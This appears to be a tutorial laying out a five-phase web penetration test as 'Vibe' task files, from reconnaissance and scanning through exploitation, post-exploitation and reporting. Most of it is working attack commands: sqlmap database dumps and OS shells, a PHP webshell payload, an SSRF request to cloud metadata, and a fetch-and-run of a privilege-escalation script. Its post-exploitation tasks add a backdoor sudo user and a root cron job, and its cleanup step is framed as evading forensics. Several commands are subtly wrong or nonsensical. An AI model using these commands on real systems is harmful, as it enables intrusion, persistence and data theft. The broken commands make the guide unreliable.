Real‑World: End‑to‑End Penetration Testing
Vibe Prompt
“Plan a comprehensive web penetration test: from information gathering, vulnerability scanning, exploitation, to shell acquisition.”
Full Workflow Overview
Phase 1 – Reconnaissance (1–2 days)
├── OSINT (domain, email, subdomains)
├── Technology Stack Identification
├── Port Scanning (Nmap)
└── Directory Enumeration (Gobuster, Dirb)
Phase 2 – Vulnerability Scanning (1–2 days)
├── Nessus / OpenVAS
├── OWASP ZAP
├── Nikto
└── Nuclei
Phase 3 – Exploitation (2–3 days)
├── SQL Injection (SQLMap)
├── XSS (manual verification)
├── File Upload Bypass
├── SSRF
├── Insecure Direct Object References (IDOR)
└── Privilege Escalation
Phase 4 – Post‑Exploitation (1 day)
├── Webshell Deployment
├── Persistence
├── Lateral Movement
├── Sensitive Data Collection
└── Cleanup & Takedown
Phase 5 – Reporting (1–2 days)
├── Vulnerability Summary
├── Risk Rating (CVSS)
├── Remediation Guidance
└── Appendix (Payloads, Screenshots)
What?
This workflow is a proven, repeatable process that covers every stage of a penetration test. It ensures that no critical step—reconnaissance, scanning, exploitation, post‑exploitation, or reporting—is omitted.
Why?
For developers and founders, a structured approach reduces the risk of costly security incidents. It also demonstrates compliance with industry standards (e.g., OWASP ASVS, NIST SP 800‑115) and can be a selling point for security‑centric customers. A well‑documented test can lower insurance premiums and provide a clear ROI by preventing data breaches that could cost millions.
How?
Using Vibe Coding, you can automate many of these steps, integrate them into CI/CD pipelines, and generate reproducible reports. Below we detail each phase with commands, tools, and Vibe‑specific scripts.
Phase 1 – Reconnaissance
1.1 OSINT
| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| theHarvester | Gather emails, subdomains, hosts | vibe run theHarvester -d target.com -b all -l 1000 |
| crt.sh | Discover certificates for subdomains | vibe run crt.sh -d target.com |
| dnsdumpster | DNS enumeration | vibe run dnsdumpster -d target.com |
Why?
Early discovery of the attack surface limits the scope of the test and ensures you focus on real assets.
How?
Create a Vibe task file recon.yml:
tasks:
- name: Gather subdomains
command: theHarvester -d target.com -b all -l 1000
- name: Certificate enumeration
command: crt.sh -d target.com
- name: DNS dump
command: dnsdumpster -d target.com
Run with vibe run recon.yml.
1.2 Technology Stack Identification
| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| WhatWeb | Detect web server, CMS, frameworks | vibe run whatweb -a 3 target.com |
| Wappalyzer | Browser extension or CLI | vibe run wappalyzer target.com |
Why?
Knowing the stack informs which vulnerability libraries and exploits are relevant.
How?
Add to recon.yml:
- name: Detect stack
command: whatweb -a 3 target.com
1.3 Port Scanning (Nmap)
# Full scan
nmap -sV -sC -O -A -p- -T4 target.com -oA nmap_report
# Parameters explained
# -sV: Service/version detection
# -sC: Default scripts
# -O: OS detection
# -A: Aggressive scan (includes OS, version, script, traceroute)
# -p-: Scan all 65535 ports
# -T4: Aggressive timing
# -oA: Output in all formats (xml, nmap, grepable)
Why?
Open ports reveal potential entry points and help prioritize scanning.
How?
Create a Vibe task:
- name: Nmap full scan
command: nmap -sV -sC -O -A -p- -T4 target.com -oA nmap_report
1.4 Directory Enumeration (Gobuster)
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50
gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30
Why?
Hidden directories often host admin panels, API endpoints, or legacy services.
How?
Add to Vibe:
- name: Gobuster directory
command: gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50
- name: Gobuster vhost
command: gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30
Phase 2 – Vulnerability Scanning
2.1 Nessus / OpenVAS
| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| Nessus | Comprehensive vulnerability scanner | vibe run nessus -s target.com |
| OpenVAS | Open‑source alternative | vibe run openvas -s target.com |
Why?
Automated scanners surface known CVEs, misconfigurations, and missing patches.
How?
Define a Vibe task:
- name: Nessus scan
command: nessus -s target.com
2.2 OWASP ZAP
zap.sh -daemon -port 8090 -config api.disablekey=true
Why?
ZAP is ideal for dynamic web application testing, especially for APIs.
How?
Create a Vibe task:
- name: Start ZAP
command: zap.sh -daemon -port 8090 -config api.disablekey=true
2.3 Nikto
nikto -h https://target.com -o nikto_report.txt
Why?
Nikto checks for outdated software, default files, and common misconfigurations.
How?
Vibe task:
- name: Nikto scan
command: nikto -h https://target.com -o nikto_report.txt
2.4 Nuclei
nuclei -u https://target.com -t nuclei-templates/ -o nuclei_report.txt
Why?
Nuclei uses a large template library for quick detection of known vulnerabilities.
How?
Vibe task:
- name: Nuclei scan
command: nuclei -u https://target.com -t nuclei-templates/ -o nuclei_report.txt
Phase 3 – Exploitation
3.1 SQL Injection (SQLMap)
# Basic injection
sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2
# List databases
sqlmap -u "https://target.com/products?id=1" --batch --dbs
# List tables in a database
sqlmap -u "https://target.com/products?id=1" --batch -D mydb --tables
# Dump a table
sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump
# Get OS shell
sqlmap -u "https://target.com/products?id=1" --batch --os-shell
Why?
SQL injection can lead to data exfiltration, privilege escalation, or remote code execution.
How?
Wrap each command in a Vibe task:
- name: SQLMap basic
command: sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2
- name: SQLMap dump users
command: sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump
3.2 Cross‑Site Scripting (XSS)
| Technique | Tool | Vibe Integration |
|-----------|------|------------------|
| Reflected XSS | Burp Intruder | vibe run burp_intruder -t target.com -p /search?q=... |
| Stored XSS | Manual injection | vibe run curl -X POST -d "comment=...<script>alert(1)</script>" https://target.com/api/comments |
Why?
XSS can hijack sessions, deface sites, or execute arbitrary scripts.
How?
Create a Vibe task for Burp Intruder:
- name: Burp Intruder XSS
command: burp_intruder -t target.com -p /search?q=... -payload "<script>alert(1)</script>"
3.3 File Upload Bypass
| Vulnerability | Exploit | Vibe Integration |
|---------------|---------|------------------|
| MIME type mismatch | Upload a PHP file disguised as image | vibe run curl -F "file=@/tmp/shell.php" https://target.com/upload |
| Directory traversal | ../../../../etc/passwd | vibe run curl -F "file=@/etc/passwd" https://target.com/upload |
Why?
Allows arbitrary code execution on the server.
How?
Vibe task:
- name: File upload bypass
command: curl -F "file=@/tmp/shell.php" https://target.com/upload
3.4 Server‑Side Request Forgery (SSRF)
curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" https://target.com/api/ssrf
Why?
SSRF can access internal services, leak secrets, or pivot to other hosts.
How?
Vibe task:
- name: SSRF test
command: curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" https://target.com/api/ssrf
3.5 Insecure Direct Object References (IDOR)
curl -X GET https://target.com/api/users/123
curl -X GET https://target.com/api/users/124
Why?
Allows attackers to read or modify data belonging to other users.
How?
Vibe task:
- name: IDOR test
command: |
for id in 123 124 125; do
curl -X GET https://target.com/api/users/$id
done
3.6 Privilege Escalation
# Linux PE script
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Common checks
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab
uname -a
cat /etc/os-release
Why?
Even if initial access is limited, privilege escalation can grant full control.
How?
Create a Vibe task:
- name: Run linPEAS
command: |
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Phase 4 – Post‑Exploitation
4.1 Webshell Deployment
| Tool | Payload | Vibe Integration |
|------|---------|------------------|
| php | <?php system($_GET['cmd']); ?> | vibe run curl -F "file=@/tmp/shell.php" https://target.com/upload |
| Node.js | require('child_process').execSync(process.argv[2]) | vibe run curl -F "file=@/tmp/shell.js" https://target.com/upload |
Why?
Provides a persistent command interface for further exploitation.
How?
Vibe task:
- name: Deploy PHP webshell
command: curl -F "file=@/tmp/shell.php" https://target.com/upload
4.2 Persistence
- Create a cron job that re‑uploads the shell.
- Add a new user with sudo privileges.
Why?
Ensures continued access even after remediation.
How?
Vibe tasks:
- name: Add cron job
command: echo "* * * * * root /usr/bin/curl -F 'file=@/tmp/shell.php' https://target.com/upload" >> /etc/crontab
- name: Add privileged user
command: useradd -m -s /bin/bash attacker && echo "attacker:password" | chpasswd && usermod -aG sudo attacker
4.3 Lateral Movement
- Enumerate other hosts via
nmap -sP 10.0.0.0/24. - Exploit SMB shares or SSH keys.
Why?
Expands the attack surface and can reach critical assets.
How?
Vibe task:
- name: Scan internal network
command: nmap -sP 10.0.0.0/24 -oG internal_hosts.txt
4.4 Sensitive Data Collection
- Dump database credentials.
- Retrieve API keys from environment variables.
Why?
Data exfiltration is the primary business impact of a breach.
How?
Vibe task:
- name: Dump credentials
command: cat /etc/credentials.txt
4.5 Cleanup & Takedown
- Delete uploaded files.
- Remove cron jobs and users.
Why?
Leaves no trace for forensic analysis.
How?
- name: Remove webshell
command: rm -f /var/www/html/shell.php
- name: Delete user
command: userdel -r attacker
Phase 5 – Reporting
5.1 Report Template (Markdown)
# Penetration Test Report
## Executive Summary
- **Target:** https://vibe-tutor.com
- **Scope:** Full web application and API surface
- **Duration:** 2026‑06‑30 to 2026‑07‑02
- **Findings:** 7 vulnerabilities (High: 2, Medium: 3, Low: 2)
- **Average CVSS:** 7.2
## High‑Risk Vulnerabilities
### H‑01: SQL Injection in /api/products
- **Description:** Unsanitized `id` parameter allows SQL injection.
- **CVSS:** 9.1 (Critical)
- **Evidence:** SQLMap successfully dumped `users` table.
- **Remediation:** Implement parameterized queries and input validation.
### H‑02: Broken Access Control in /api/admin
- **Description:** No authentication for admin endpoints.
- **CVSS:** 8.2 (High)
- **Evidence:** Direct access to `/api/admin/users` returned all user data.
- **Remediation:** Add role‑based middleware and enforce JWT validation.
## Medium‑Risk Vulnerabilities
... (details omitted for brevity)
## Low‑Risk Vulnerabilities
... (details omitted for brevity)
## Appendix
- **Payloads:** List of all payloads used.
- **Screenshots:** Attach relevant screenshots.
- **Logs:** Include scan logs and exploitation outputs.
5.2 How to Generate the Report with Vibe
Create a Vibe task:
- name: Generate report
command: |
echo "# Penetration Test Report" > report.md
echo "## Executive Summary" >> report.md
# Append findings programmatically
You can automate the insertion of findings by parsing scan outputs and using a templating engine like Jinja2 within Vibe